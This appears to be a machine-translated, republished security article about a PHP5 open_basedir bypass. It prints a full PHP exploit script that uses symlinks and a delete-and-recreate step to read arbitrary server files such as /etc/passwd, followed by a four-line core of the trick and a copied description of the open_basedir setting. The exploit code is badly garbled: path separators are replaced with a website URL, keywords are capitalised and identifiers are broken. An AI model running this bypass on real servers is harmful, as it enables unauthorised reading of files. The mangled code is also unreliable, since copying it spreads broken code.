PHP5 full-version bypass open_basedir File Read Script Vulnerability details

This article mainly introduces the PHP5 full-version bypass open_basedir File Read Script Vulnerability, which was proposed a long time ago (about five years ago) and still exists in the latest version, if you need a friend

This article mainly introduces the PHP5 full-version bypass open_basedir File Read Script Vulnerability, which was proposed a long time ago (about five years ago) and still exists in the latest version, if you need a friend

The vulnerability was raised a long time ago (about five years ago), but it is not a problem in php code, so the problem persists until now. I never noticed that yaseng told me that he could test 5.5.

Here is the vulnerability details.

Given the exp I wrote:

The Code is as follows:

<? Php
/*
* By phithon
* From
* Detail:
*/
Header ('content-type: text/plain ');
Error_reporting (-1 );
Ini_set ('display _ errors ', TRUE );
Printf ("open_basedir: % s \ nphp_version: % s \ n", ini_get ('Open _ basedir '), phpversion ());
Printf ("disable_functions: % s \ n", ini_get ('Disable _ functions '));
$ File = str_replace ('\', 'HTTP: // www.jb51.net/', isset ($ _ REQUEST ['file'])? $ _ REQUEST ['file']: '/etc/passwd ');
$ Relat_file = getRelativePath (_ FILE __, $ file );
$ Paths = explode ('HTTP: // www.jb51.net/', $ file );
$ Name = mt_rand () % 999;
$ Exp = getRandStr ();
Mkdir ($ name );
Chdir ($ name );
For ($ I = 1; $ I <count ($ paths)-1; $ I ++ ){
Mkdir ($ paths [$ I]);
Chdir ($ paths [$ I]);
}
Mkdir ($ paths [$ I]);
For ($ I-= 1; $ I> 0; $ I --){
Chdir ('..');
}
$ Paths = explode ('HTTP: // www.jb51.net/', $ relat_file );
$ J = 0;
For ($ I = 0; $ paths [$ I] = '..'; $ I ++ ){
Mkdir ($ name );
Chdir ($ name );
$ J ++;
}
For ($ I = 0; $ I <= $ j; $ I ++ ){
Chdir ('..');
}
$ Tmp = array_fill (0, $ j + 1, $ name );
Symlink (implode ('HTTP: // www.jb51.net/', $ tmp), 'tmplink ');
$ Tmp = array_fill (0, $ j ,'..');
Symlink ('tmplink/'. implode ('HTTP: // www.jb51.net/', $ tmp). $ file, $ exp );
Unlink ('tmplink ');
Mkdir ('tmplink ');
Delfile ($ name );
$ Exp = dirname ($ _ SERVER ['script _ name']). "/{$ exp }";
$ Exp = "http: // {$ _ SERVER ['server _ name']} {$ exp }";
Echo "\ n ----------------- content --------------- \ n ";
Echo file_get_contents ($ exp );
Delfile ('tmplink ');

Function getRelativePath ($ from, $ ){
// Some compatibility fixes for Windows paths
$ From = rtrim ($ from, '\/'). 'HTTP: // www.jb51.net /';
$ From = str_replace ('\', 'HTTP: // www.jb51.net/', $ from );
$ To = str_replace ('\', 'HTTP: // www.jb51.net/', $ );

$ From = explode ('HTTP: // www.jb51.net/', $ from );
$ To = explode ('HTTP: // www.jb51.net/', $ );
$ RelPath = $;

Foreach ($ from as $ depth => $ dir ){
// Find first non-matching dir
If ($ dir = $ to [$ depth]) {
// Ignore this directory
Array_shift ($ relPath );
} Else {
// Get number of remaining dirs to $ from
$ Remaining = count ($ from)-$ depth;
If ($ remaining> 1 ){
// Add traversals up to first matching dir
$ PadLength = (count ($ relPath) + $ remaining-1) *-1;
$ RelPath = array_pad ($ relPath, $ padLength ,'..');
Break;
} Else {
$ RelPath [0] = './'. $ relPath [0];
}
}
}
Return implode ('HTTP: // www.jb51.net/', $ relPath );
}

Function delfile ($ deldir ){
If (@ is_file ($ deldir )){
@ Chmod ($ deldir, 0777 );
Return @ unlink ($ deldir );
} Else if (@ is_dir ($ deldir )){
If ($ mydir = @ opendir ($ deldir) = NULL) return false;
While (false! ==( $ File = @ readdir ($ mydir )))
{
$ Name = File_Str ($ deldir. 'HTTP: // www.jb51.net/'.w.file );
If ($ file! = '.') & ($ File! = '..') {Delfile ($ name );}
}
@ Closedir ($ mydir );
@ Chmod ($ deldir, 0777 );
Return @ rmdir ($ deldir )? True: false;
}
}

Function File_Str ($ string)
{
Return str_replace ('//', 'HTTP: // www.jb51.net/', str_replace ('\', 'HTTP: // www.jb51.net/', reply string ));
}

Function getRandStr ($ length = 6 ){
$ Chars = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789 ';
$ RandStr = '';
For ($ I = 0; $ I <$ length; $ I ++ ){
$ RandStr. = substr ($ chars, mt_rand (0, strlen ($ chars)-1), 1 );
}
Return $ randStr;
}

For example, we want to read/etc/passwd. In fact, the principle is to create a link file x, point to a/a with the relative path, and then create a link file exp pointing to x /.. /.. /.. /etc/passwd.

It actually points to a/.../etc/passwd, which is actually./etc/passwd.

In this case, delete x and create another x Directory. However, exp still points to x/../etc/passwd, so it is successfully transferred to/etc/passwd.

The essence is the following four sentences:

The Code is as follows:

Symlink ("abc/abc", "tmplink ");
Symlink ("tmplink/.../etc/passwd", "exploit ");
Unlink ("tmplink ");
Mkdir ("tmplink ");

If the server supports access to linked files, you can read/etc/passwd.

No operation triggers open_basedir, but the result is that open_basedir is bypassed to read arbitrary files.

The error is not in php, but I don't know who is responsible for the error, so php never cares about this problem.

Open_basedir

Restrict files that can be opened by PHP to the specified directory tree, including the file itself. This command is not affected by enabling or disabling security mode.

When a script tries to open a file using fopen () or gzopen (), the file location will be checked. PHP rejects opening a file outside the specified directory tree. All symbolic connections are parsed, so it is impossible to avoid this restriction through symbolic connections.

Special value. indicates that the script's working directory will be used as the reference directory. But this is dangerous because the working directory of the script can be easily changed by chdir.

In the httpd. conf file, open_basedir can be disabled using the "php_admin_value open_basedir none" method like any other configuration options (for example, in some virtual hosts ).

In Windows, separate directories with semicolons. Use colons to separate directories in any other system. As an Apache module, the open_basedir path in the parent directory is automatically inherited.